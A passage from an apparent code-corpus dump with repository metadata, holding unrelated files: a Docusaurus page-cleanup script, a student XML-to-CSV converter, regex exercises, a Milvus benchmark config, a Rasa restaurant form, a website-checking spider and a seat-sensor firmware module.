# create_intro_mdx('zh-Hant')
# %% [markdown]
# ## Clear generated pages
#
# Delete folders `/docs/{year}/`, `/i18n/{locale}/docusaurus-plugin-content-docs/current/{year}/` and all their contents
# %%
def clear_generated_pages():
'''
Delete folders `/docs/{year}/`, `/i18n/{locale}/docusaurus-plugin-content-docs/current/{year}/` and all their contents
'''
print('Start clearing generated files...')
for y in range(start_year, cur_year + 2):
dir_to_delete = Path('..', '..', 'docs', str(y))
dir_to_delete_sc = Path('..', '..', 'i18n', 'zh-Hans', 'docusaurus-plugin-content-docs', 'current', str(y))
dir_to_delete_en = Path('..', '..', 'i18n', 'en', 'docusaurus-plugin-content-docs', 'current', str(y))
dir_to_delete_fr = Path('..', '..', 'i18n', 'fr', 'docusaurus-plugin-content-docs', 'current', str(y))
if dir_to_delete.is_dir():
shutil.rmtree(dir_to_delete)
print(f"> deleted folder `{y}` in `/docs/` (as well as all its contents)")
if dir_to_delete_sc.is_dir():
shutil.rmtree(dir_to_delete_sc)
print(f"> deleted folder `{y}` in `/i18n/zh-Hans/docusaurus-plugin-content-docs/current/` (as well as all its contents)")
if dir_to_delete_en.is_dir():
shutil.rmtree(dir_to_delete_en)
print(f"> deleted folder `{y}` in `/i18n/en/docusaurus-plugin-content-docs/current/` (as well as all its contents)")
if dir_to_delete_fr.is_dir():
shutil.rmtree(dir_to_delete_fr)
print(f"> deleted folder `{y}` in `/i18n/fr/docusaurus-plugin-content-docs/current/` (as well as all its contents)")
print('Finish clearing generated files.')
# clear_generated_pages()
# %% [markdown]
# ## Define and execute the `main` function
# %%
def main():
clear_generated_pages()
generate_pages(2020,3,1,cur_year,lastest_month,lastest_day)
create_intro_mdx('zh-Hant')
create_intro_mdx('zh-Hans')
create_intro_mdx('en')
create_intro_mdx('fr')
main()
| 36.076087 | 213 | 0.623305 |
3e166c873f0545edf44e1c03b024dfdfc36a7abf
| 2,929 |
py
|
Python
|
Jeney/02_Exercise/ex2.py
|
appfs/appfs
|
8cbbfa0e40e4d4a75a498ce8dd894bb2fbc3a9e3
|
[
"MIT"
] | 11 |
2017-04-21T11:39:55.000Z
|
2022-02-11T20:25:18.000Z
|
Jeney/02_Exercise/ex2.py
|
appfs/appfs
|
8cbbfa0e40e4d4a75a498ce8dd894bb2fbc3a9e3
|
[
"MIT"
] | 69 |
2017-04-26T09:30:38.000Z
|
2017-08-01T11:31:21.000Z
|
Jeney/02_Exercise/ex2.py
|
appfs/appfs
|
8cbbfa0e40e4d4a75a498ce8dd894bb2fbc3a9e3
|
[
"MIT"
] | 53 |
2017-04-20T16:16:11.000Z
|
2017-07-19T12:53:01.000Z
|
#Advanced Practical Programming For Scientists
#Assignment 2
#author: Viktor Jeney
#written in Python 3
#This program reads an XML file and writes it into a CSV file.
#For each of those tasks there is a separate function written.
#The filename to read has to be the first argument from the command line.
#The filename to write into has to be the second argument from the command line.
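#Example invocation (the sample XML name comes from the commented-out test further down):
# python ex2.py example.measured-1-1-0.xml output.csv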
import sys
from bs4 import BeautifulSoup as Soup
import csv
###############################################################################
def readXML(filename):
#reads an xml file using BeautifulSoup with lxml parser
#input: name of file
#returns: list with 3 entries: date as YYYY-MM-DD, time as HH
# and value of measured power without unit
#
#initializing list to return
measurements=[]
#initializing temporary objects
currentDay=''
currentTime=''
currentPower=''
#opening file with handler
with open(filename,'r') as fileHandler:
#parse the file into an soup object using lxml parser
#note that all the tags have only lower case letters now
#because xml should't distinguish between lower and upper case
soup=Soup(fileHandler,'lxml')
#find all tags 'gasDay '
for day in soup.findAll('gasday'):
#set the date for list entry
currentDay=day.attrs['date']
#find all tags 'boundarynode'
#this is just to make sure that the rest is enclosed in a
#boundarynode tag
for node in day.findAll('boundarynode'):
#find all tags 'time'
for time in node.findAll('time'):
#set the time for list entry
currentTime=time.attrs['hour'].zfill(2)
#find all tags 'amountofpower'
for power in time.findAll('amountofpower'):
currentPower=power.attrs['value']
measurements.append([currentDay,currentTime,\
currentPower])
return measurements
###############################################################################
def writeCSV(fileName,data):
    #write the given data into a CSV file
    #input: name of file, data (list of rows)
    #returns: None
#open file with handler
with open(fileName,'w') as fileHandler:
#create CSV writer
writer = csv.writer(fileHandler, delimiter=',')
#iterate through data
for line in data:
#write row
writer.writerow(line)
###############################################################################
#read filenames out of system input
inputName=sys.argv[1]
outputName=sys.argv[2]
#inputName='example.measured-1-1-0.xml'
#outputName='output.csv'
#read in the measurements
measurements=readXML(inputName)
#write the measurements into csv file
writeCSV(outputName,measurements)
| 32.544444 | 79 | 0.58211 |
9005bc1ed0035663e147c53f3cce14d31c7eb1e1
| 2,088 |
py
|
Python
|
vorl5-ueb1-regex.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb1-regex.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb1-regex.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
# 5th lecture, 17.10.2020, Python script 4 (07_Python_04.pdf)
import re
# Exercise 1:
'''
1. Find the word "Python" or "python"
2. The content of an entire comment line
3. A single character that is a digit or a sign (+/-)
'''
# Task 1
#daten = "ython python -*0201/637434* -467.1345"
#muster = "^[Pp]ython"
# Task 2
#daten = " # Kommentarzeile mit vielen Wörtern und so...besser wäre einlesen einer Datei, zeilenweise"
#muster = "^([#]|[ #]).*"
# Task 3
#daten = "Python python -*0201/637434* -467.1345"
#muster = "[0-9]|[-]|[+]"
'''
4. A character that is not a letter
5. An IP address
6. A text line with exactly three characters
'''
# Task 4
#daten = "ython python -*0201/637434* -467.1345"
#muster = "[^A-Za-z]"
# Task 5
#daten = "ython python 127.0.0.1 0.0.0.0 192.168.0.1 10.10.10.1 -*0201/637434* -467.1345"
#muster = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
# Task 6
#daten = "yth"
#muster = "^.{3}$"
'''
7. A date (12.12.12, 1.1.20 or 12.12.2012)
8. A valid e-mail address
9. A negative number with 4 decimal places
10. A landline number with one star before and one after: *1231/121231*
'''
# Task 7
#daten = "ython 01.01.2020 python -*0201 20.2.123 /637434* 14.10.1999 -467.1345asdh ahsdl 1.2.09"
#muster = "\d{1,2}\.\d{1,2}\.\d{2,4}" # caveat: three-digit year fragments are matched too
# Task 8
#daten = "ython 01.01.2020 [email protected] [email protected] [email protected] pytho [email protected] -*0201 [email protected] 20.2.123 /637434* 14.10.1999 -467.1345asdh ahsdl 1.2.09"
#muster = "[\.\_\-\w]+\@[\w]+\.[\w]+"
# Task 9
#daten = "ython 01.01.2020 -123,1234 123.1234 321,4321 -431,5431123 -1.1234567 python -*0201 20.2.123 /637434* 14.10.1999 -467.1345asdh ahsdl 1.2.09"
#muster = "\s(-\d+[,\.]\d{4})"
# Task 10 (left uncommented so the findall below has input to run against)
daten = "ython python -*0201/637434* -467.1345"
muster = "\*\d+/\d+\*"
ergebnis = re.findall(muster,daten)
if ergebnis:
print("Gefunden: ")
for fundstelle in ergebnis:
print(" -> '" + fundstelle +"'")
else:
print("Nicht gefunden!")
| 27.116883 | 173 | 0.632184 |
ffd3ad210a0d6e0f8813ddf8affffbe59b0cc912
| 1,698 |
py
|
Python
|
benchmark_test/scripts/config.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | 1 |
2021-04-06T06:13:20.000Z
|
2021-04-06T06:13:20.000Z
|
benchmark_test/scripts/config.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
benchmark_test/scripts/config.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
from milvus import Milvus,DataType
import os
MILVUS_HOST = "192.168.1.58"
MILVUS_PORT = 19573
# create table param
seg = 1024
METRIC_TYPE = "L2"
# index IVF param
NLIST = 4096
PQ_M = 12
#index NSG param
SEARCH_LENGTH = 45
OUT_DEGREE = 50
CANDIDATE_POOL = 300
KNNG = 100
#index HNSW param
HNSW_M = 16
EFCONSTRUCTION = 500
# NL_FOLDER_NAME = '/data/lcl/200_ann_test/source_data'
# insert param
FILE_TYPE = 'npy'
FILE_NPY_PATH = '/data1/workspace/jingjing/bootcamp/benchmark_test/test/milvus_sift1m'
FILE_CSV_PATH = '/data1/lym/dataset_test/csv_dataset'
FILE_FVECS_PATH = '/mnt/data/base.fvecs'
FILE_BVECS_PATH = '/data/workspace/lym/milvus_test/data/sift_data/bigann_base.bvecs'
# VECS_VEC_NUM = 1000000000
VECS_VEC_NUM = 20000
VECS_BASE_LEN = 20000
if_normaliz = False
# performance param
NQ_FOLDER_NAME = '/data1/workspace/jingjing/bootcamp/benchmark_test/test/query_data'
PERFORMANCE_FILE_NAME = 'performance'
nq_scope = [1,10,100,500]
#nq_scope = [1000, 1000]
topk_scope = [1, 10,100,500]
#nq_scope = [1, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750, 800]
#topk_scope = [1,1, 20, 50, 100, 300, 500, 800, 1000]
IS_CSV = False
IS_UINT8 = False
#recall param
recall_topk = 500
compute_recall_topk = [1, 10, 100,500]
recall_nq = 500
recall_vec_fname = '/data1/workspace/jingjing/bootcamp/benchmark_test/test/query_data/query.npy'
#recall_vec_fname = '/data/workspace/lym/milvus_08_bootcamp/bootcamp/benchmark_test/scripts/data/sift1m/data/binary_128d_00000.npy'
GT_FNAME_NAME = '/data1/workspace/jingjing/bootcamp/benchmark_test/test/gnd/ground_truth_1M.txt'
recall_res_fname = 'recall_result'
recall_out_fname = 'recall_result/recall_compare_out'
| 23.583333 | 131 | 0.767373 |
8aafdb41cfcb3d905748244f6e4a6c9107578fba
| 12,246 |
py
|
Python
|
MAIN/STM32F405/V13/register.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405/V13/register.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405/V13/register.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
import os
import peripheral
import time
OPEN_SCENE_SHOW_TIME = 2500
CLOSING_TIME = 10000
CLOSE_SCENE_SHOW_TIME = 1000
MAX_SEAT_NUMBER = 33
InComingDataSize = 10
class Proximity:
class Default:
Threshold = 100
PositiveTolerance = 10
NegativeTolerance = 25
constVal = 1
divider = 10
multiple = 1
thresholdDivider = 2
class Sensor():
FullData = bytearray(InComingDataSize)
def __init__(self, ID=bytearray(3), IsSensorHasID=False, Prox1Active=False, Prox1Config=bytearray(5), Prox2Active=False, Prox2Config=bytearray(5)):
super().__init__()
self.ID = ID
self.IsSensorHasID = IsSensorHasID
self.Prox1_ConfigAddressInArray = 3
self.Prox1_ResolationAddressInArray = 5
self.Prox1_Threshold = Proximity.Default.Threshold
self.Prox1_PositiveTolerance = Proximity.Default.PositiveTolerance
self.Prox1_NegativeTolerance = Proximity.Default.NegativeTolerance
self.Prox1_CurrentResolation = 0
self.Prox1_IsSeatActive = False
self.Prox1_IsSeatHasPassanger = False
self.Prox1_IsSeatHasBelt = False
self.Prox2_ConfigAddressInArray = 4
self.Prox2_ResolationAddressInArray = 6
self.Prox2_Threshold = Proximity.Default.Threshold
self.Prox2_PositiveTolerance = Proximity.Default.PositiveTolerance
self.Prox2_NegativeTolerance = Proximity.Default.NegativeTolerance
self.Prox2_CurrentResolation = 0
self.Prox2_IsSeatActive = False
self.Prox2_IsSeatHasPassanger = False
self.Prox2_IsSeatHasBelt = False
        self.BatteryMeasurement = 0
        self.BatteryMeasurementPercent = 0
if Prox1Active == True:
self.Prox1_ConfigAddressInArray = Prox1Config[0]
self.Prox1_ResolationAddressInArray = Prox1Config[1]
self.Prox1_Threshold = Prox1Config[2]
self.Prox1_PositiveTolerance = Prox1Config[3]
self.Prox1_NegativeTolerance = Prox1Config[4]
self.Prox1_IsSeatActive = True
if Prox2Active == True:
self.Prox2_ConfigAddressInArray = Prox2Config[0]
self.Prox2_ResolationAddressInArray = Prox2Config[1]
self.Prox2_Threshold = Prox2Config[2]
self.Prox2_PositiveTolerance = Prox2Config[3]
self.Prox2_NegativeTolerance = Prox2Config[4]
self.Prox2_IsSeatActive = True
def DataIn(self, data=bytearray(InComingDataSize)):
if data[:3] != self.ID:
return False
ref1Res = data[self.Prox1_ResolationAddressInArray + 1] | (data[self.Prox1_ResolationAddressInArray] << 8)
ref2Res = data[self.Prox2_ResolationAddressInArray + 1] | (data[self.Prox2_ResolationAddressInArray] << 8)
Prox1ResolationCurrentValue = 0 if ref1Res > 8191 else ref1Res
Prox2ResolationCurrentValue = 0 if ref2Res > 8191 else ref2Res
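        # the battery byte appears to pack the high nibbles of data[3] and data[4]
        # into one 8-bit value plus a fixed offset of 9 (inferred from the masks below)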
self.BatteryMeasurement = (data[3] & 0xF0 | (data[4] & 0xF0) >> 4) + 9
self.BatteryMeasurementPercent = round(((self.BatteryMeasurement * 2.5 / 255 * 2) - 2.0) / 1.2 * 10) * 10
self.BatteryMeasurementPercent = 100 if self.BatteryMeasurementPercent > 100 else self.BatteryMeasurementPercent
self.BatteryMeasurementPercent = 0 if self.BatteryMeasurementPercent < 0 else self.BatteryMeasurementPercent
self.Calibration(Prox1ResolationCurrentValue, Prox2ResolationCurrentValue)
if self.Prox1_IsSeatActive == True:
self.Prox1_CurrentResolation = Prox1ResolationCurrentValue
if self.Prox1_CurrentResolation > (self.Prox1_Threshold + self.Prox1_PositiveTolerance):
self.Prox1_IsSeatHasPassanger = True
elif self.Prox1_CurrentResolation < (self.Prox1_Threshold - self.Prox1_NegativeTolerance):
self.Prox1_IsSeatHasPassanger = False
self.Prox1_IsSeatHasBelt = True if ((data[self.Prox1_ConfigAddressInArray] >> 1) & 0x01) == 1 else False
#self.Prox1_IsSeatActive = True if (data[self.Prox1_ConfigAddressInArray] & 0x01) == 1 else False
if self.Prox2_IsSeatActive == True:
self.Prox2_CurrentResolation = Prox2ResolationCurrentValue
if self.Prox2_CurrentResolation > (self.Prox2_Threshold + self.Prox2_PositiveTolerance):
self.Prox2_IsSeatHasPassanger = True
elif self.Prox2_CurrentResolation < (self.Prox2_Threshold - self.Prox2_NegativeTolerance):
self.Prox2_IsSeatHasPassanger = False
self.Prox2_IsSeatHasBelt = True if ((data[self.Prox2_ConfigAddressInArray] >> 1) & 0x01) == 1 else False
#self.Prox2_IsSeatActive = True if (data[self.Prox2_ConfigAddressInArray] & 0x01) == 1 else False
#print("\rSensor ID: {}".format(self.ID))
#print("Battery Level: %{}".format(self.BatteryMeasurementPercent))
#print("Proximity _1_ Status:\n\rResolation: {}\n\rSensor Active: {}\n\rSeatbelt Pluged: {}".format(self.Prox1_CurrentResolation, self.Prox1_IsSeatActive, self.Prox1_IsSeatHasBelt))
#print("Proximity _2_ Status:\n\rResolation: {}\n\rSensor Active: {}\n\rSeatbelt Pluged: {}".format(self.Prox2_CurrentResolation, self.Prox2_IsSeatActive, self.Prox2_IsSeatHasBelt))
return True
def Calibration(self, p1Res=0, p2Res=0):
if p1Res > p2Res and p1Res > Proximity.Default.Threshold:
self.Prox1_Threshold = p1Res * 0.6
self.Prox2_Threshold = self.Prox1_Threshold
print("th: {}, res: {}".format(self.Prox1_Threshold, p1Res))
elif p2Res > p1Res and p2Res > Proximity.Default.Threshold:
self.Prox2_Threshold = p2Res * 0.6
self.Prox1_Threshold = self.Prox2_Threshold
print("th: {}, res: {}".format(self.Prox1_Threshold, p1Res))
elif p1Res == 0 and p2Res == 0:
self.Prox1_Threshold = Proximity.Default.Threshold
self.Prox2_Threshold = Proximity.Default.Threshold
#print("p1Threshold:{}, p2Threshold:{}, defaultThreshold:{}".format(self.Prox1_Threshold + self.Prox1_PositiveTolerance, self.Prox2_Threshold + self.Prox2_PositiveTolerance, Proximity.Default.Threshold))
class DataBase():
def __init__(self):
super().__init__()
self.SensorList = []
self.dbRaw = ""
self.rawList = ""
self.file = ""
self.IsDbFileExist = False
self.Setup()
def Setup(self):
self.CreateDbFile("SensorDB.db")
if self.IsDbFileExist == True:
self.ImportRawDataFromDB()
self.UnzipRawData()
    def CreateDbFile(self, name="SensorDB.db"):
        # Opens the file read-only purely to test for existence; close the
        # handle so it is not leaked.
        try:
            self.file = open(name, "r")
            self.file.close()
            self.IsDbFileExist = True
        except OSError:
            pass
def FlushRawDataToDB(self):
if self.dbRaw == "":
return
with open("SensorDB.db", "w") as self.file:
self.file.write(self.dbRaw)
time.sleep(.01)
self.file.flush()
time.sleep(.01)
self.file.close()
time.sleep(.01)
def ImportRawDataFromDB(self):
with open("SensorDB.db", "r") as self.file:
self.dbRaw = self.file.read()
time.sleep(.01)
self.file.close()
def UnzipRawData(self):
if self.dbRaw == "":
return
self.rawList = self.dbRaw.splitlines()
self.dbRaw = ""
self.SensorList.clear()
tList = []
for item in self.rawList:
temporaryData = item.split('*')
for d in temporaryData[0].split(','):
if d != "":
tList.append(int(d))
D1 = bytearray(tList)
tList.clear()
            D2 = temporaryData[1] == "True"
            D3 = temporaryData[2] == "True"
for d in temporaryData[3].split(','):
if d != "":
tList.append(int(d))
D4 = bytearray(tList)
tList.clear()
            D5 = temporaryData[4] == "True"
for d in temporaryData[5].split(','):
if d != "":
tList.append(int(d))
D6 = bytearray(tList)
tList.clear()
self.CreateSensorObject(D1, D2, D3, D4, D5, D6)
    def Process(self, fullData=[]):
        for data in fullData:
            if self.SensorList and self.CheckCRC(data) == True:
                for item in self.SensorList:
                    if item.DataIn(data) == True:
                        # Sensor IDs are unique, so stop scanning once a sensor
                        # has accepted the frame (the original `continue` was a no-op).
                        break
    def DefineSensorObject(self, fullData=[]):
        for data in fullData:
            if self.CheckCRC(data) == True:
                # Reset per frame: in the original, checkFlag was set once before
                # the loop, so a single known ID blocked every later frame. The
                # stray no-op `self.SensorList` expression statement is dropped.
                checkFlag = True
                if self.SensorList:
                    for item in self.SensorList:
                        if item.ID == data[:3]:
                            checkFlag = False
                            break
if checkFlag is True:
print(fullData)
if (((data[3] >> 0) & 0x01) == 1) and (data[6] | (data[5] << 8)) > (data[8] | (data[7] << 8)):
if ((data[4] >> 0) & 0x01) == 1:
self.CreateSensorObject(data[:3], True, True, [3, 5, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance], True, [4, 7, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance])
else:
self.CreateSensorObject(data[:3], True, True, [3, 5, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance], False, [4, 7, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance])
elif (((data[4] >> 0) & 0x01) == 1) and (data[8] | (data[7] << 8)) > (data[6] | (data[5] << 8)):
if ((data[3] >> 0) & 0x01) == 1:
self.CreateSensorObject(data[:3], True, True, [4, 7, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance], True, [3, 5, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance])
else:
self.CreateSensorObject(data[:3], True, True, [4, 7, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance], False, [3, 5, Proximity.Default.Threshold, Proximity.Default.PositiveTolerance, Proximity.Default.NegativeTolerance])
def CreateSensorObject(self, ID=bytearray(3), IsSensorHasID=False, Prox1Active=False, Prox1Config=bytearray(5), Prox2Active=False, Prox2Config=bytearray(5)):
self.SensorList.append(Sensor(ID, IsSensorHasID, Prox1Active, Prox1Config, Prox2Active, Prox2Config))
for b in ID:
self.dbRaw += str(b) + ","
self.dbRaw += "*"
self.dbRaw += str(IsSensorHasID)
self.dbRaw += "*"
self.dbRaw += str(Prox1Active)
self.dbRaw += "*"
for b in Prox1Config:
self.dbRaw += str(b) + ","
self.dbRaw += "*"
self.dbRaw += str(Prox2Active)
self.dbRaw += "*"
for b in Prox2Config:
self.dbRaw += str(b) + ","
self.dbRaw += "\n"
replay = 1
if Prox1Active == True and Prox2Active == True:
replay = 2
peripheral.buzzerObject(replay=replay, onTime=25)
print(self.dbRaw)
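    # --- Format note (added by the editor; the byte values are illustrative) ---
    # A serialized row produced above looks like:
    #   "1,2,3,*True*True*3,5,100,10,25,*False*4,7,100,10,25,\n"
    # i.e. ID bytes, IsSensorHasID, Prox1Active, Prox1Config bytes, Prox2Active
    # and Prox2Config bytes, '*'-separated -- exactly what UnzipRawData parses.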
def CheckCRC(self, data=bytearray(InComingDataSize)):
crc = 0xDB
for i in range(len(data) - 1):
crc ^= data[i]
print("\n\rCRC:{}, C:{}, Status: {}".format(crc, data[len(data) - 1], bool(crc == data[len(data) - 1])))
return bool(crc == data[len(data) - 1])
def ClearAllData(self):
self.SensorList.clear()
self.dbRaw = ""
try:
os.remove("SensorDB.db")
except OSError:
pass
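# --- Hedged example (added by the editor; not part of the original firmware) ---
# A minimal sketch of the frame checksum used by DataBase.CheckCRC above,
# assuming a 10-byte frame whose final byte is the XOR checksum seeded with
# 0xDB. The payload bytes here are made up for illustration.
def _demo_crc_frame():
    frame = bytearray([0x01, 0x02, 0x03, 0x11, 0x01, 0x00, 0x50, 0x00, 0x40, 0x00])
    crc = 0xDB
    for b in frame[:-1]:
        crc ^= b            # same XOR fold as CheckCRC
    frame[-1] = crc         # a receiver recomputing the XOR will accept this frame
    return frame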
| 43.119718 | 302 | 0.608035 |
8ab8310083b8af1b3349e8e88818e5aed663f3d0
| 4,459 |
py
|
Python
|
examples/formbot/actions/actions.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | 1 |
2020-10-14T18:09:10.000Z
|
2020-10-14T18:09:10.000Z
|
examples/formbot/actions/actions.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | 209 |
2020-03-18T18:28:12.000Z
|
2022-03-01T13:42:29.000Z
|
examples/formbot/actions/actions.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Text, Any, List, Union
from rasa_sdk import Tracker
from rasa_sdk.executor import CollectingDispatcher
from rasa_sdk.forms import FormAction
class RestaurantForm(FormAction):
"""Example of a custom form action."""
def name(self) -> Text:
"""Unique identifier of the form."""
return "restaurant_form"
@staticmethod
def required_slots(tracker: Tracker) -> List[Text]:
"""A list of required slots that the form has to fill."""
return ["cuisine", "num_people", "outdoor_seating", "preferences", "feedback"]
def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:
"""A dictionary to map required slots to
- an extracted entity
- intent: value pairs
- a whole message
        or a list of them, where the first match will be picked."""
return {
"cuisine": self.from_entity(entity="cuisine", not_intent="chitchat"),
"num_people": [
self.from_entity(
entity="number", intent=["inform", "request_restaurant"]
),
],
"outdoor_seating": [
self.from_entity(entity="seating"),
self.from_intent(intent="affirm", value=True),
self.from_intent(intent="deny", value=False),
],
"preferences": [
self.from_intent(intent="deny", value="no additional preferences"),
self.from_text(not_intent="affirm"),
],
"feedback": [self.from_entity(entity="feedback"), self.from_text()],
}
@staticmethod
def cuisine_db() -> List[Text]:
"""Database of supported cuisines."""
return [
"caribbean",
"chinese",
"french",
"greek",
"indian",
"italian",
"mexican",
]
@staticmethod
def is_int(string: Text) -> bool:
"""Check if a string is an integer."""
try:
int(string)
return True
except ValueError:
return False
def validate_cuisine(
self,
value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
"""Validate cuisine value."""
if value.lower() in self.cuisine_db():
# validation succeeded, set the value of the "cuisine" slot to value
return {"cuisine": value}
else:
dispatcher.utter_message(template="utter_wrong_cuisine")
# validation failed, set this slot to None, meaning the
# user will be asked for the slot again
return {"cuisine": None}
def validate_num_people(
self,
value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
"""Validate num_people value."""
if self.is_int(value) and int(value) > 0:
return {"num_people": value}
else:
dispatcher.utter_message(template="utter_wrong_num_people")
# validation failed, set slot to None
return {"num_people": None}
def validate_outdoor_seating(
self,
value: Text,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> Dict[Text, Any]:
"""Validate outdoor_seating value."""
if isinstance(value, str):
if "out" in value:
# convert "out..." to True
return {"outdoor_seating": True}
elif "in" in value:
# convert "in..." to False
return {"outdoor_seating": False}
else:
dispatcher.utter_message(template="utter_wrong_outdoor_seating")
# validation failed, set slot to None
return {"outdoor_seating": None}
else:
# affirm/deny was picked up as True/False by the from_intent mapping
return {"outdoor_seating": value}
def submit(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> List[Dict]:
"""Define what the form has to do after all required slots are filled."""
dispatcher.utter_message(template="utter_submit")
return []
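# --- Hedged usage sketch (added; not part of the official Rasa example) ---
# Shows the validation contract informally: a validate_<slot> helper returns a
# dict mapping the slot to a value on success, or to None so the form re-asks.
if __name__ == "__main__":
    print(RestaurantForm.is_int("4"))     # True  -> validate_num_people keeps the slot
    print(RestaurantForm.is_int("four"))  # False -> slot is reset to None and re-asked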
| 31.624113 | 86 | 0.555954 |
8ad110e2b7bfc382f38046b0b8aa2b57b45e41bb
| 3,255 |
py
|
Python
|
spider/spider.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | null | null | null |
spider/spider.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | null | null | null |
spider/spider.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | null | null | null |
"""
Provides the spider functionality (website checks).
"""
import argparse
import json
import logging
import re
import statistics
import time
from datetime import datetime
from pprint import pprint
from google.api_core.exceptions import InvalidArgument
from google.cloud import datastore
import checks
import config
import jobs
import rating
def check_and_rate_site(entry):
"""
Performs our site checks, calculates the score
and returns results as a dict.
"""
# all the info we'll return for the site
result = {
# input_url: The URL we derived all checks from
'input_url': entry['url'],
# Meta: Regional and type metadata for the site
'meta': {
'type': entry.get('type'),
'level': entry.get('level'),
'state': entry.get('state'),
'district': entry.get('district'),
'city': entry.get('city'),
},
# checks: Results from our checks
'checks': {},
# The actual report scoring criteria
'rating': {},
# resulting score
'score': 0.0,
}
# Results from our next generation checkers
result['checks'] = checks.perform_checks(entry['url'])
result['rating'] = rating.calculate_rating(result['checks'])
# Overall score is the sum of the individual scores
for key in result['rating']:
result['score'] += result['rating'][key]['score']
    # remove full HTML page content and hyperlinks to save some storage
    try:
        for url in result['checks']['page_content']:
            del result['checks']['page_content'][url]['content']
        del result['checks']['hyperlinks']
    except KeyError:
        # these checks may legitimately be absent; anything else should surface
        pass
return result
def test_url(url):
"""
Run the spider for a single URL and print the result.
Doesn't write anything to the database.
"""
logging.info("Crawling URL %s", url)
# mock job
job = {
"url": url,
}
result = check_and_rate_site(entry=job)
pprint(result['rating'])
def work_of_queue(datastore_client, entity_kind):
"""
Take job from queue and finish it until there are no more jobs
"""
while True:
job = jobs.get_job_from_queue(datastore_client)
if job is None:
logging.info("No more jobs. Exiting.")
break
logging.info("Starting job %s", job["url"])
result = check_and_rate_site(entry=job)
logging.debug("Full JSON representation of returned result: %s", json.dumps(result, default=str))
logging.info("Job %s finished checks", job["url"])
logging.info("Job %s writing to DB", job["url"])
key = datastore_client.key(entity_kind, job["url"])
entity = datastore.Entity(key=key)
record = {
'created': datetime.utcnow(),
'meta': result['meta'],
'checks': result['checks'],
'rating': result['rating'],
'score': result['score'],
}
entity.update(record)
try:
datastore_client.put(entity)
except InvalidArgument as ex:
logging.error("Could not write result: %s", ex)
except Exception as ex:
logging.error("Could not write result: %s", ex)
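# --- Hedged sketch (added by the editor; not part of the green-spider code) ---
# The overall score computed in check_and_rate_site() is simply the sum of the
# per-criterion scores; the criterion names below are illustrative only.
def _sum_scores(rating):
    # rating maps criterion name -> {"score": float, ...}
    return sum(criterion["score"] for criterion in rating.values())
# _sum_scores({"DNS": {"score": 1.0}, "HTTPS": {"score": 2.0}})  ->  3.0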
| 27.584746 | 105 | 0.604301 |
0a19083dfe5a7bbe31b5ca56b93085bcdd1ec4da
| 5,598 |
py
|
Python
|
official_examples/Using_MXNet_to_Create_a_MNIST_Dataset_Recognition_Application/codes/customize_service.py
|
hellfire0831/ModelArts-Lab
|
3e826a5b388244c0588b7bb916184750997ab272
|
[
"Apache-2.0"
] | 1,045 |
2019-05-09T02:50:43.000Z
|
2022-03-31T06:22:11.000Z
|
official_examples/Using_MXNet_to_Create_a_MNIST_Dataset_Recognition_Application/codes/customize_service.py
|
hellfire0831/ModelArts-Lab
|
3e826a5b388244c0588b7bb916184750997ab272
|
[
"Apache-2.0"
] | 1,468 |
2019-05-16T00:48:18.000Z
|
2022-03-08T04:12:44.000Z
|
official_examples/Using_MXNet_to_Create_a_MNIST_Dataset_Recognition_Application/codes/customize_service.py
|
hellfire0831/ModelArts-Lab
|
